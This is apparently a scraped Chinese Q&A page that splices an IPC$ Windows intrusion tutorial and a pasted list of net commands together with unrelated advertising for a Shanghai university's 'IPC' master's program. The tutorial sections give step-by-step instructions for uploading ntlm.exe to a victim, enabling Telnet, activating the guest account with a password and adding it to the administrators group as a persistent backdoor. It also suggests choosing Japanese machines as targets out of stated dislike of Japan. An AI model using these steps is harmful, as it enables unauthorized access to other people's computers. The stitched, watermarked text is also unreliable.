雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了

7.C:\> ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。

8. C:\WINNT\system32>ntlm

輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候，就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!

9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)

為了以防萬一,我們再把guest激活加到管理組

10. C:\>net user guest /active:yes

將對方的Guest用戶激活

11. C:\>net user guest 1234

將Guest的密碼改為1234,或者你要設定的密碼

12. C:\>net localgroup administrators guest /add

將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這台計算機)

十 總結:

關於ipc入侵就說這么多了,覺得已經夠詳細了,如果有不準確的地方,希望能與大家討論.

最後,希望大家不要隨便入侵,我寫這篇文章的目的是想解答大家的疑惑,並不是鼓勵大家隨便的入侵,如果你非想試一下,建議拿小日本的機子開練(什麼?為什麼?因為我討厭日本,沒別的)

『捌』 上海對外經貿大學ipc碩士1+1項目升學怎麼樣

上海對外經貿大學目前已經有24年的國際教育經驗，逐步形成了以下優勢：華東地區涉外商科大學：華東地區涉外商科大學，將商科專業與外語特色精巧結合的大學。教育部留基委合作共建：留基委合作共建，海外名校優先錄取，教育部學歷認證。上經貿大在編師資：上經貿大松江校區學習生活，與統招生享受同等師資，充分享受名校資源。校內學習，校內住宿：25人/班，小班制教學，充分照顧每個同學的學習情況。班主任跟班管理，定期家校溝通。海外服務團隊解決國外難題：國外有成熟的留基委服務團隊能夠解決學生在國外遇到的生活與學習上的問題。歸國就業優先落戶：擁有海外留學背景以及高學歷人才，在回國以後可以充分享受到國家對留學生的優惠政策，並且在求職者中脫穎而出。擁有國內外人脈資源：國內國外學習2年，積累到更多優秀的人脈資源，貼近高端商務人脈圈，更有利學生今後的職業生涯發展。1國內一年，國外一年，取得國外名校碩士學位
2免考研、免GRE/GMAT等應試考核

3多國知名院校、選擇空間大：英美澳加新等英語授課國家都可選擇

4多專業選擇，可跨專業申請

專科生：商科類、經管類、社科類、傳媒類等
本科生：除上述專業外均可以銜接本科原專業
5國內課程：雅思+基礎碩士專業課

國外課程：核心碩士專業
6安全留學：國內1年准備，減小留學風險，組團去留學，儲備國內人脈資源

『玖』 與目標IP建立IPC$空連接是否需要在區域網內 需要的是內網IP還是外網IP

看來你連原理都不清楚。 如果原理就不清楚可以使用自帶傳馬的工具。 一句兩句是說不清楚的 。 給你點DOS攻擊命令 只自己看下。 以下復制+粘貼 net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接 網管聯盟bitsCN_com net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接 網管聯盟bitsCN@com net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H: 網管網www_bitscn_com net use h: \\ip\c$ 登陸後映射對方C：到本地為H: 網管朋友網www_bitscn_net net use \\ip\ipc$ /del 刪除IPC鏈接 網管聯盟bitsCN@com net use h: /del 刪除映射對方到本地的為H:的映射 網管網www_bitscn_com net user 用戶名 密碼 /add 建立用戶 中國網管論壇bbs.bitsCN.com net user guest /active:yes 激活guest用戶 網管有家bitscn.net net user 查看有哪些用戶 網管u家 net user 帳戶名 查看帳戶的屬性 網管聯盟bitsCN@com net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數 網管網 net start 查看開啟了哪些服務 網管論壇bbs_bitsCN_com net start 服務名 開啟服務;(如:net start telnet， net start schele) 網管聯盟bitsCN@com net stop 服務名 停止某服務 網管u家 net time \\目標ip 查看對方時間 中國網管論壇bbs.bitsCN.com net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息 網管u家bitscn.net net view 查看本地區域網內開啟了哪些共享 網管聯盟bitsCN@com net view \\ip 查看對方區域網內開啟了哪些共享 網管u家bitscn.net net config 顯示系統網路設置 網管下載dl.bitscn.com net logoff 斷開連接的共享 網管bitscn_com net pause 服務名 暫停某服務 網管u家u.bitscn@com net send ip "文本信息" 向對方發信息 網管下載dl.bitscn.com net ver 區域網內正在使用的網路連接類型和信息 網管u家u.bitscn@com net share 查看本地開啟的共享 網管論壇bbs_bitsCN_com net share ipc$ 開啟ipc$共享 中國網管聯盟bitsCN.com net share ipc$ /del 刪除ipc$共享 網管朋友網www_bitscn_net net share c$ /del 刪除C：共享 網管論壇bbs_bitsCN_com net user guest 12345 用guest用戶登陸後用將密碼改為12345 網管有家 net password 密碼 更改系統登陸密碼 網管u家u.bitsCN.com netstat -a 查看開啟了哪些埠,常用netstat -an 網管u家 netstat -n 查看埠的網路連接情況，常用netstat -an 網管聯盟bitsCN@com netstat -v 查看正在進行的工作 網管論壇bbs_bitsCN_com netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況) 網管u家 netstat -s 查看正在使用的所有協議使用情況 網管u家u.bitscn@com nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近

『拾』 上海對外經貿大學IPC碩士項目對接的學校怎麼樣

學校介紹：
上海對外經貿大學，是為適應新中國對外貿易事業快速發展需要而建立的高等院校，是原對外經濟貿易部（商務部前身）所屬的4所高校之一。
世界貿易組織（WTO）首批12所教席院校之一（中國唯一）。
中國政府獎學金來華留學生接受院校。
國際商學院協會( AACSB)會員。
中國(上海)自由貿易區人才培養基地。
教育部考試中心：托福、雅思、GRE 等授權考點。

項目背景：
上海對外經貿大學與國家留學基金委員會下屬東方國際教育交流中心合作共建的國外名校碩士培訓課程。
為中國學生量身定製的赴美國、英國、澳大利亞、紐西蘭等國家就讀碩士專業的培訓課程，旨在幫助學生掌握專業基礎知識，培養綜合學習能力和素質，充分適應海外先進的教學模式，順利完成赴海外學習過渡，降低學生在海外學習的緊迫感與留學成本。

項目特色：
國內一年，國外一年，取得國外名校碩士學位；
免考研、免GRE/GMAT等應試考核；
多國留學、選擇空間大：英澳新等英語授課國家都可選擇；
多專業選擇，可跨專業申請：
專科生：商科類、經管類、社科類、傳媒類等
本科生：除上述專業外均可以銜接本科原專業
國內課程：雅思+基礎碩士專業課，國外課程：核心碩士專業課；
安全留學：國內1年准備，減小留學風險，組團去留學，儲備國內人脈資源。

項目優勢：
上海對外經貿大學目前已經有20多年的國際教育經驗，逐步形成了以下優勢：
特色鮮明：以培養高層次、應用型、國際化經貿人才為使命，力爭發展成為規模適度，結構合理，人才培養、科學研究、社會服務和文化傳承與創新協調發展的高水平、國際化、特色鮮明的應用研究型大學。
教育部留基委官方授權：留基委官方授權，海外名校優先錄取，學歷教育部認證。
高校師資：在大學城學習生活，與統招生享受同等師資，充分享受名校資源。
校內學習，校內住宿：小班制教學，班主任老師定期家校溝通，解決學生問題。
國內國外擴大人脈資源：國內國外學習2年，積累到更多優秀的人脈資源，貼近高端經濟圈，很好的幫助學生以後的職業發展。
國內階段：上海對外經貿大學碩士培訓課程學習
學習期限：1年
學習內容：語言培訓、專業基礎課程、西方文化課以及升學指導課
畢業學習：學生順利通過所有課程，且雅思達到相應要求後，將獲得結業證書和成績單
國外階段：赴英、澳、新、美等國家攻讀碩士學位階段
學習期限：1-2年
學習內容：海外大學碩士階段課程學習
畢業所得：學生順利通過該學位要求的所有課程，並完成論文，將獲得國外大學頒發的碩士學位證書
回國以後由教育部頒發國外學歷學位認證書